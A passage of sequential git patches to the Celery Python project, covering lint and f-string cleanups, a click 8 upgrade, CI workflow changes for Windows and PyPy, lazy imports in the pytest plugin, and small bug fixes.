--- a/examples/eventlet/webcrawler.py
+++ b/examples/eventlet/webcrawler.py
@@ -23,15 +23,15 @@
import re
import requests
-
-from celery import group, task
from eventlet import Timeout
from pybloom import BloomFilter
+from celery import group, task
+
try:
from urllib.parse import urlsplit
except ImportError:
- from urlparse import urlsplit # noqa
+ from urlparse import urlsplit
# http://daringfireball.net/2009/11/liberal_regex_for_matching_urls
url_regex = re.compile(
diff --git a/setup.cfg b/setup.cfg
index fc8847c6200..448e97dce2a 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,7 @@ all_files = 1
# whenever it makes the code more readable.
max-line-length = 117
extend-ignore =
+ E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972
D102, # Missing docstring in public method
D104, # Missing docstring in public package
D105, # Missing docstring in magic method
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index a2102b8bf19..adc88ede47b 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,7 +1,7 @@
import os
import sys
-from celery import Celery # noqa
+from celery import Celery
os.environ.update(
NOSETPS='yes',
@@ -48,13 +48,13 @@ def it(_, n):
# by previous runs, or the broker.
i = it.cur
if i and not i % 5000:
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
it.subt = time.monotonic()
if not i:
it.subt = it.time_start = time.monotonic()
elif i > n - 2:
total = tdiff(it.time_start)
- print('({} so far: {}s)'.format(i, tdiff(it.subt)), file=sys.stderr)
+ print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr)
print('-- process {} tasks: {}s total, {} tasks/s'.format(
n, total, n / (total + .0),
))
@@ -68,7 +68,7 @@ def bench_apply(n=DEFAULT_ITS):
task = it._get_current_object()
with app.producer_or_acquire() as producer:
[task.apply_async((i, n), producer=producer) for i in range(n)]
- print('-- apply {} tasks: {}s'.format(n, time.monotonic() - time_start))
+ print(f'-- apply {n} tasks: {time.monotonic() - time_start}s')
def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'):
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
index a45f3622390..861e30b905e 100644
--- a/t/distro/test_CI_reqs.py
+++ b/t/distro/test_CI_reqs.py
@@ -31,5 +31,5 @@ def test_all_reqs_enabled_in_tests():
defined = ci_default | ci_base
all_extras = _get_all_extras()
diff = all_extras - defined
- print('Missing CI reqs:\n{}'.format(pprint.pformat(diff)))
+ print(f'Missing CI reqs:\n{pprint.pformat(diff)}')
assert not diff
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index 2c48d43e07e..3109d021a33 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -93,7 +93,7 @@ def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT):
# try again later
sleep(check_interval)
else:
- raise TimeoutError("{!r} was never incremented".format(redis_key))
+ raise TimeoutError(f"{redis_key!r} was never incremented")
# There should be no more increments - block momentarily
sleep(min(1, timeout))
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 82dd49d1514..2cb2f33c9db 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -12,7 +12,7 @@
try:
import pyArango
except ImportError:
- pyArango = None # noqa
+ pyArango = None
pytest.importorskip('pyArango')
diff --git a/t/unit/backends/test_couchbase.py b/t/unit/backends/test_couchbase.py
index a29110c9439..297735a38ba 100644
--- a/t/unit/backends/test_couchbase.py
+++ b/t/unit/backends/test_couchbase.py
@@ -13,7 +13,7 @@
try:
import couchbase
except ImportError:
- couchbase = None # noqa
+ couchbase = None
COUCHBASE_BUCKET = 'celery_bucket'
diff --git a/t/unit/backends/test_couchdb.py b/t/unit/backends/test_couchdb.py
index c8b4a43ec2c..41505594f72 100644
--- a/t/unit/backends/test_couchdb.py
+++ b/t/unit/backends/test_couchdb.py
@@ -11,7 +11,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
COUCHDB_CONTAINER = 'celery_container'
diff --git a/t/unit/backends/test_dynamodb.py b/t/unit/backends/test_dynamodb.py
index 62f50b6625b..6fd2625c0cb 100644
--- a/t/unit/backends/test_dynamodb.py
+++ b/t/unit/backends/test_dynamodb.py
@@ -13,7 +13,7 @@
class test_DynamoDBBackend:
def setup(self):
- self._static_timestamp = Decimal(1483425566.52) # noqa
+ self._static_timestamp = Decimal(1483425566.52)
self.app.conf.result_backend = 'dynamodb://'
@property
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 275d4f2f521..f240123a448 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -36,8 +36,8 @@ def stop(self):
def apply_async(self, *args, **kwargs):
pass
- mp = _mp() # noqa
- asynpool = None # noqa
+ mp = _mp()
+ asynpool = None
class MockResult:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index d355fe31edd..90dc50682d5 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -27,7 +27,7 @@
)
try:
- WindowsError = WindowsError # noqa
+ WindowsError = WindowsError
except NameError:
class WindowsError(Exception):
diff --git a/t/unit/contrib/test_sphinx.py b/t/unit/contrib/test_sphinx.py
index de0d04aa5af..a4d74e04465 100644
--- a/t/unit/contrib/test_sphinx.py
+++ b/t/unit/contrib/test_sphinx.py
@@ -21,7 +21,6 @@ def test_sphinx():
app = TestApp(srcdir=SRCDIR, confdir=SRCDIR)
app.build()
contents = open(os.path.join(app.outdir, 'contents.html'),
- mode='r',
encoding='utf-8').read()
assert 'This is a sample Task' in contents
assert 'This is a sample Shared Task' in contents
diff --git a/t/unit/utils/test_dispatcher.py b/t/unit/utils/test_dispatcher.py
index b5e11c40bb8..b100b68b800 100644
--- a/t/unit/utils/test_dispatcher.py
+++ b/t/unit/utils/test_dispatcher.py
@@ -15,13 +15,13 @@ def garbage_collect():
elif hasattr(sys, 'pypy_version_info'):
- def garbage_collect(): # noqa
+ def garbage_collect():
# Collecting weakreferences can take two collections on PyPy.
gc.collect()
gc.collect()
else:
- def garbage_collect(): # noqa
+ def garbage_collect():
gc.collect()
diff --git a/t/unit/utils/test_functional.py b/t/unit/utils/test_functional.py
index 8312b8fd7ca..721fd414a3e 100644
--- a/t/unit/utils/test_functional.py
+++ b/t/unit/utils/test_functional.py
@@ -279,7 +279,7 @@ class test_head_from_fun:
def test_from_cls(self):
class X:
- def __call__(x, y, kwarg=1): # noqa
+ def __call__(x, y, kwarg=1):
pass
g = head_from_fun(X())
@@ -406,7 +406,7 @@ def fun(a, b, foo):
])
def test_seq_concat_seq(a, b, expected):
res = seq_concat_seq(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
@@ -416,7 +416,7 @@ def test_seq_concat_seq(a, b, expected):
])
def test_seq_concat_item(a, b, expected):
res = seq_concat_item(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index f218857d605..256a7d6cefe 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -26,7 +26,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
def test_isatty():
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index 72ea98c4603..8e1e02d64df 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -11,7 +11,7 @@
from celery.utils.collections import AttributeDict
from celery.utils.timer2 import Timer
-from celery.worker import WorkController as _WC # noqa
+from celery.worker import WorkController as _WC
from celery.worker import consumer, control
from celery.worker import state as worker_state
from celery.worker.pidbox import Pidbox, gPidbox
diff --git a/tox.ini b/tox.ini
index 6c74e65576b..5e0b4a73f76 100644
--- a/tox.ini
+++ b/tox.ini
@@ -38,7 +38,7 @@ deps=
integration: -r{toxinidir}/requirements/test-integration.txt
linkcheck,apicheck,configcheck: -r{toxinidir}/requirements/docs.txt
- flake8: -r{toxinidir}/requirements/pkgutils.txt
+ lint: pre-commit
bandit: bandit
commands =
@@ -79,7 +79,7 @@ basepython =
3.9: python3.9
3.10: python3.10
pypy3: pypy3
- flake8,apicheck,linkcheck,configcheck,bandit: python3.9
+ lint,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
@@ -101,6 +101,6 @@ commands =
commands =
bandit -b bandit.json -r celery/
-[testenv:flake8]
+[testenv:lint]
commands =
- flake8 -j 2 {toxinidir}
+ pre-commit {posargs:run --all-files --show-diff-on-failure}
From ef026ea44f59e5d234c195c3ce73927f8323f9ee Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 20 Jul 2021 17:19:02 +0100
Subject: [PATCH 016/177] relaxed click version (#6861)
* relaxed click version
* fix get_default
* pre-check WorkersPool click.Choice type before calling super
https://github.com/pallets/click/issues/1898#issuecomment-841546735
* apply pre-commit run --all-files
Co-authored-by: Asif Saif Uddin
---
celery/bin/base.py | 4 ++--
celery/bin/worker.py | 4 ++++
requirements/default.txt | 4 ++--
3 files changed, 8 insertions(+), 4 deletions(-)
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 0eba53e1ce0..95af1a89316 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -138,10 +138,10 @@ def caller(ctx, *args, **kwargs):
class CeleryOption(click.Option):
"""Customized option for Celery."""
- def get_default(self, ctx):
+ def get_default(self, ctx, *args, **kwargs):
if self.default_value_from_context:
self.default = ctx.obj[self.default_value_from_context]
- return super().get_default(ctx)
+ return super().get_default(ctx, *args, **kwargs)
def __init__(self, *args, **kwargs):
"""Initialize a Celery option."""
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index eecd8743abe..68a0d117247 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -11,6 +11,7 @@
from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL,
CeleryDaemonCommand, CeleryOption,
handle_preload_options)
+from celery.concurrency.base import BasePool
from celery.exceptions import SecurityError
from celery.platforms import (EX_FAILURE, EX_OK, detached,
maybe_drop_privileges)
@@ -45,6 +46,9 @@ def __init__(self):
def convert(self, value, param, ctx):
# Pools like eventlet/gevent needs to patch libs as early
# as possible.
+ if isinstance(value, type) and issubclass(value, BasePool):
+ return value
+
value = super().convert(value, param, ctx)
worker_pool = ctx.obj.app.conf.worker_pool
if value == 'prefork' and worker_pool:
diff --git a/requirements/default.txt b/requirements/default.txt
index afa9d16f251..b892226269a 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -2,8 +2,8 @@ pytz>dev
billiard>=3.6.4.0,<4.0
kombu>=5.1.0,<6.0
vine>=5.0.0,<6.0
-click>=7.0,<8.0
+click>=8.0,<9.0
click-didyoumean>=0.0.3
-click-repl>=0.1.6
+click-repl>=0.2.0
click-plugins>=1.1.1
setuptools
From 11f816bbfcceab641ecb9db35688996a864b67ec Mon Sep 17 00:00:00 2001
From: maybe-sybr <58414429+maybe-sybr@users.noreply.github.com>
Date: Wed, 21 Jul 2021 14:05:14 +1000
Subject: [PATCH 017/177] doc: Amend IRC network link to Libera (#6837)
* doc: Amend IRC network link to Libera
Ref #6811
* Update README.rst
Co-authored-by: Thomas Grainger
Co-authored-by: Asif Saif Uddin
Co-authored-by: Thomas Grainger
---
README.rst | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.rst b/README.rst
index ee7c1f84306..a4f05abf96d 100644
--- a/README.rst
+++ b/README.rst
@@ -421,10 +421,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
-network.
+Come chat with us on IRC. The **#celery** channel is located at the
+`Libera Chat`_ network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat/
.. _bug-tracker:
From c557c750dd5e84b6f219094e46dbf7c30d0a15fa Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 21 Jul 2021 13:30:09 +0300
Subject: [PATCH 018/177] Run CI on the 5.0 branch as well.
---
.github/workflows/python-package.yml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 42c56683e4a..a515d3de55d 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -5,13 +5,13 @@ name: Celery
on:
push:
- branches: [ master ]
+ branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
pull_request:
- branches: [ master ]
+ branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
From 59d88326b8caa84083c01efb3a3983b3332853e9 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Thu, 22 Jul 2021 09:00:57 +0100
Subject: [PATCH 019/177] test on 3.10.b4 (#6867)
---
.github/workflows/python-package.yml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index a515d3de55d..5ca6f54fdb1 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,8 +24,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.3', 'pypy3']
- continue-on-error: ${{ matrix.python-version == '3.10.0-beta.3' }}
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
From bb8030562752dbcd1d130a878f4a0326ad93fc02 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Thu, 22 Jul 2021 10:22:28 +0100
Subject: [PATCH 020/177] create github action for windows (#6271)
* create github action for windows
* increase tox verbosity
* configure pip caching/requirements
* Update .github/workflows/windows.yml
* define kombu sqs passthrough dep
* drop 3.9 from windows due to pycurl
* skip test_check_privileges_suspicious_platform[accept_content0] on win32, py38+
* fails on py38+ win32
* bump the maxfail a bit to get more error context
* xfail all py3.8+ windows tests
* re-enable -v
* pytest.raises does not raise AssertionError
https://github.com/pytest-dev/pytest/issues/8928
* more xfails
* merge windows workflow into python-package
* only install apt packages on ubuntu-*
* bust pip cache with matrix.os
* step.if doesn't need {{
* Update python-package.yml
* Windows is never considerred a sus platform
this is because Microsft is beyond reproach
* fix merge resolution error
---
.github/workflows/python-package.yml | 15 ++++++++++++---
requirements/extras/sqs.txt | 3 +--
t/unit/utils/test_platforms.py | 15 ++++++++++++++-
tox.ini | 2 +-
4 files changed, 28 insertions(+), 7 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 5ca6f54fdb1..93e4ae9a13e 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -20,15 +20,24 @@ on:
jobs:
build:
- runs-on: ubuntu-20.04
+ runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ os: ["ubuntu-20.04", "windows-2019"]
+ exclude:
+ - os: windows-2019
+ python-version: "pypy3"
+ - os: windows-2019
+ python-version: "3.10.0-beta.4"
+ - os: windows-2019
+ python-version: "3.9"
continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
- name: Install apt packages
+ if: startsWith(matrix.os, 'ubuntu-')
run: |
sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
- uses: actions/checkout@v2
@@ -46,9 +55,9 @@ jobs:
with:
path: ${{ steps.pip-cache.outputs.dir }}
key:
- ${{ matrix.python-version }}-v1-${{ hashFiles('**/setup.py') }}
+ ${{ matrix.python-version }}-${{matrix.os}}-${{ hashFiles('**/setup.py') }}
restore-keys: |
- ${{ matrix.python-version }}-v1-
+ ${{ matrix.python-version }}-${{matrix.os}}
- name: Install tox
run: python -m pip install tox tox-gh-actions
diff --git a/requirements/extras/sqs.txt b/requirements/extras/sqs.txt
index d4a662987a7..8a7fc342f07 100644
--- a/requirements/extras/sqs.txt
+++ b/requirements/extras/sqs.txt
@@ -1,2 +1 @@
-boto3>=1.9.125
-pycurl==7.43.0.5 # Latest version with wheel built (for appveyor)
+kombu[sqs]
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index 256a7d6cefe..f0b1fde8d3a 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -825,10 +825,17 @@ def test_setgroups_raises_EPERM(self, hack, getgroups):
getgroups.assert_called_with()
+fails_on_win32 = pytest.mark.xfail(
+ sys.platform == "win32",
+ reason="fails on py38+ windows",
+)
+
+
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
- {'pickle', 'application/group-python-serialize'}
+ {'pickle', 'application/group-python-serialize'},
])
@patch('celery.platforms.os')
def test_check_privileges_suspicious_platform(os_module, accept_content):
@@ -866,6 +873,7 @@ def test_check_privileges_no_fchown(os_module, accept_content, recwarn):
assert len(recwarn) == 0
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -886,6 +894,7 @@ def test_check_privileges_without_c_force_root(os_module, accept_content):
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -903,6 +912,7 @@ def test_check_privileges_with_c_force_root(os_module, accept_content):
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
({'pickle'}, 'sudo'),
({'application/group-python-serialize'}, 'sudo'),
@@ -931,6 +941,7 @@ def test_check_privileges_with_c_force_root_and_with_suspicious_group(
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
({'pickle'}, 'sudo'),
({'application/group-python-serialize'}, 'sudo'),
@@ -960,6 +971,7 @@ def test_check_privileges_without_c_force_root_and_with_suspicious_group(
check_privileges(accept_content)
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
@@ -988,6 +1000,7 @@ def test_check_privileges_with_c_force_root_and_no_group_entry(
assert recwarn[1].message.args[0] == expected_message
+@fails_on_win32
@pytest.mark.parametrize('accept_content', [
{'pickle'},
{'application/group-python-serialize'},
diff --git a/tox.ini b/tox.ini
index 5e0b4a73f76..e3fb16cfc84 100644
--- a/tox.ini
+++ b/tox.ini
@@ -42,7 +42,7 @@ deps=
bandit: bandit
commands =
- unit: pytest -xv --cov=celery --cov-report=xml --cov-report term {posargs}
+ unit: pytest --maxfail=10 -v --cov=celery --cov-report=xml --cov-report term {posargs}
integration: pytest -xsv t/integration {posargs}
setenv =
BOTO_CONFIG = /dev/null
From ea1df2ba82e2492657c2e6c512f85a188ecdec18 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Fri, 23 Jul 2021 10:04:30 +0100
Subject: [PATCH 021/177] import celery lazilly in pytest plugin and unignore
flake8 F821, "undefined name '...'" (#6872)
* unignore f821
* defer celery imports in celery pytest plugin
---
celery/contrib/pytest.py | 17 +++++++++++++++--
celery/contrib/testing/manager.py | 3 ++-
celery/contrib/testing/mocks.py | 6 +++++-
celery/contrib/testing/worker.py | 4 +++-
celery/events/state.py | 7 +++----
celery/platforms.py | 25 ++++++++++---------------
celery/utils/collections.py | 1 +
celery/utils/log.py | 1 +
celery/utils/saferepr.py | 2 ++
celery/utils/text.py | 1 +
setup.cfg | 1 -
t/benchmarks/bench_worker.py | 1 +
t/integration/test_canvas.py | 2 +-
13 files changed, 45 insertions(+), 26 deletions(-)
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index c54ea5cb0fa..f44a828ecaa 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -1,11 +1,17 @@
"""Fixtures and testing utilities for :pypi:`pytest `."""
import os
from contextlib import contextmanager
+from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union
import pytest
-from .testing import worker
-from .testing.app import TestApp, setup_default_app
+if TYPE_CHECKING:
+ from celery import Celery
+
+ from ..worker import WorkController
+else:
+ Celery = WorkController = object
+
NO_WORKER = os.environ.get('NO_WORKER')
@@ -30,6 +36,9 @@ def _create_app(enable_logging=False,
**config):
# type: (Any, Any, Any, **Any) -> Celery
"""Utility context used to setup Celery app for pytest fixtures."""
+
+ from .testing.app import TestApp, setup_default_app
+
parameters = {} if not parameters else parameters
test_app = TestApp(
set_as_current=False,
@@ -83,6 +92,8 @@ def celery_session_worker(
):
# type: (...) -> WorkController
"""Session Fixture: Start worker that lives throughout test suite."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_session_app.loader.import_task_module(module)
@@ -188,6 +199,8 @@ def celery_worker(request,
celery_worker_parameters):
# type: (Any, Celery, Sequence[str], str, Any) -> WorkController
"""Fixture: Start worker in a thread, stop it when the test returns."""
+ from .testing import worker
+
if not NO_WORKER:
for module in celery_includes:
celery_app.loader.import_task_module(module)
diff --git a/celery/contrib/testing/manager.py b/celery/contrib/testing/manager.py
index d053a03e81a..5c5c3e7797c 100644
--- a/celery/contrib/testing/manager.py
+++ b/celery/contrib/testing/manager.py
@@ -4,12 +4,13 @@
from collections import defaultdict
from functools import partial
from itertools import count
+from typing import Any, Callable, Dict, Sequence, TextIO, Tuple
from kombu.utils.functional import retry_over_time
from celery import states
from celery.exceptions import TimeoutError
-from celery.result import ResultSet
+from celery.result import AsyncResult, ResultSet
from celery.utils.text import truncate
from celery.utils.time import humanize_seconds as _humanize_seconds
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 6294e6905cb..82775011afc 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -1,6 +1,10 @@
"""Useful mocks for unit testing."""
import numbers
from datetime import datetime, timedelta
+from typing import Any, Mapping, Sequence
+
+from celery import Celery
+from celery.canvas import Signature
try:
from case import Mock
@@ -49,7 +53,7 @@ def TaskMessage1(
kwargs=None, # type: Mapping
callbacks=None, # type: Sequence[Signature]
errbacks=None, # type: Sequence[Signature]
- chain=None, # type: Squence[Signature]
+ chain=None, # type: Sequence[Signature]
**options # type: Any
):
# type: (...) -> Any
diff --git a/celery/contrib/testing/worker.py b/celery/contrib/testing/worker.py
index 09fecc0a7a2..b4e68cb8dec 100644
--- a/celery/contrib/testing/worker.py
+++ b/celery/contrib/testing/worker.py
@@ -2,8 +2,10 @@
import os
import threading
from contextlib import contextmanager
+from typing import Any, Iterable, Union
-from celery import worker
+import celery.worker.consumer
+from celery import Celery, worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
diff --git a/celery/events/state.py b/celery/events/state.py
index f8ff9ad687e..087131aeec3 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -22,6 +22,7 @@
from itertools import islice
from operator import itemgetter
from time import time
+from typing import Mapping
from weakref import WeakSet, ref
from kombu.clocks import timetuple
@@ -429,15 +430,13 @@ def __init__(self, callback=None,
self._tasks_to_resolve = {}
self.rebuild_taskheap()
- # type: Mapping[TaskName, WeakSet[Task]]
self.tasks_by_type = CallableDefaultdict(
- self._tasks_by_type, WeakSet)
+ self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_type.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks))
- # type: Mapping[Hostname, WeakSet[Task]]
self.tasks_by_worker = CallableDefaultdict(
- self._tasks_by_worker, WeakSet)
+ self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]]
self.tasks_by_worker.update(
_deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks))
diff --git a/celery/platforms.py b/celery/platforms.py
index 82fed9cb9f0..d2fe02bede3 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -581,6 +581,14 @@ def _setuid(uid, gid):
'non-root user able to restore privileges after setuid.')
+if hasattr(_signal, 'setitimer'):
+ def _arm_alarm(seconds):
+ _signal.setitimer(_signal.ITIMER_REAL, seconds)
+else:
+ def _arm_alarm(seconds):
+ _signal.alarm(math.ceil(seconds))
+
+
class Signals:
"""Convenience interface to :mod:`signals`.
@@ -619,21 +627,8 @@ class Signals:
ignored = _signal.SIG_IGN
default = _signal.SIG_DFL
- if hasattr(_signal, 'setitimer'):
-
- def arm_alarm(self, seconds):
- _signal.setitimer(_signal.ITIMER_REAL, seconds)
- else: # pragma: no cover
- try:
- from itimer import alarm as _itimer_alarm
- except ImportError:
-
- def arm_alarm(self, seconds):
- _signal.alarm(math.ceil(seconds))
- else: # pragma: no cover
-
- def arm_alarm(self, seconds):
- return _itimer_alarm(seconds)
+ def arm_alarm(self, seconds):
+ return _arm_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index 1fedc775771..df37d12c3b4 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -7,6 +7,7 @@
from heapq import heapify, heappop, heappush
from itertools import chain, count
from queue import Empty
+from typing import Any, Dict, Iterable, List
from .functional import first, uniq
from .text import match_case
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 8ca34e7c5ae..48a2bc40897 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -6,6 +6,7 @@
import threading
import traceback
from contextlib import contextmanager
+from typing import AnyStr, Sequence
from kombu.log import LOG_LEVELS
from kombu.log import get_logger as _get_logger
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index d079734fc5d..adcfc72efca 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -15,6 +15,8 @@
from itertools import chain
from numbers import Number
from pprint import _recursion
+from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence,
+ Set, Tuple)
from .text import truncate
diff --git a/celery/utils/text.py b/celery/utils/text.py
index d685f7b8fc7..661a02fc002 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -5,6 +5,7 @@
from functools import partial
from pprint import pformat
from textwrap import fill
+from typing import Any, List, Mapping, Pattern
__all__ = (
'abbr', 'abbrtask', 'dedent', 'dedent_initial',
diff --git a/setup.cfg b/setup.cfg
index 448e97dce2a..3638e56dc6f 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -23,7 +23,6 @@ extend-ignore =
D412, # No blank lines allowed between a section header and its content
E741, # ambiguous variable name '...'
E742, # ambiguous class definition '...'
- F821, # undefined name '...'
per-file-ignores =
t/*,setup.py,examples/*,docs/*,extra/*:
# docstrings
diff --git a/t/benchmarks/bench_worker.py b/t/benchmarks/bench_worker.py
index adc88ede47b..5c9f6f46ba3 100644
--- a/t/benchmarks/bench_worker.py
+++ b/t/benchmarks/bench_worker.py
@@ -1,5 +1,6 @@
import os
import sys
+import time
from celery import Celery
diff --git a/t/integration/test_canvas.py b/t/integration/test_canvas.py
index 3109d021a33..11079a70d92 100644
--- a/t/integration/test_canvas.py
+++ b/t/integration/test_canvas.py
@@ -1538,7 +1538,7 @@ def test_chord_on_error(self, manager):
res.children[0].children[0].result
).result
failed_task_id = uuid_patt.search(str(callback_chord_exc))
- assert (failed_task_id is not None), "No task ID in %r" % callback_exc
+ assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc
failed_task_id = failed_task_id.group()
# Use new group_id result metadata to get group ID.
From afff659fcca833ea48483b219355044dc8de7aa2 Mon Sep 17 00:00:00 2001
From: Jonas Kittner
Date: Tue, 20 Jul 2021 19:48:21 +0200
Subject: [PATCH 022/177] fix inspect --json output to return valid json
without --quiet
---
celery/bin/control.py | 2 ++
1 file changed, 2 insertions(+)
diff --git a/celery/bin/control.py b/celery/bin/control.py
index a13963a54b3..fbd3730c490 100644
--- a/celery/bin/control.py
+++ b/celery/bin/control.py
@@ -144,6 +144,8 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
if json:
ctx.obj.echo(dumps(replies))
+ return
+
nodecount = len(replies)
if not ctx.obj.quiet:
ctx.obj.echo('\n{} {} online.'.format(
From 170e96a4c39366ba2c2f9120b042cd7f7c0a00be Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Mon, 26 Jul 2021 23:08:18 +0100
Subject: [PATCH 023/177] configure pypy3.7
---
.github/workflows/python-package.yml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 93e4ae9a13e..185072632dc 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,11 +24,13 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy3']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.4', 'pypy-3.6', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- os: windows-2019
- python-version: "pypy3"
+ python-version: 'pypy-3.7'
+ - os: windows-2019
+ python-version: 'pypy-3.6'
- os: windows-2019
python-version: "3.10.0-beta.4"
- os: windows-2019
From f02d7c60051ce5202349fe7c795ebf5000d9526d Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
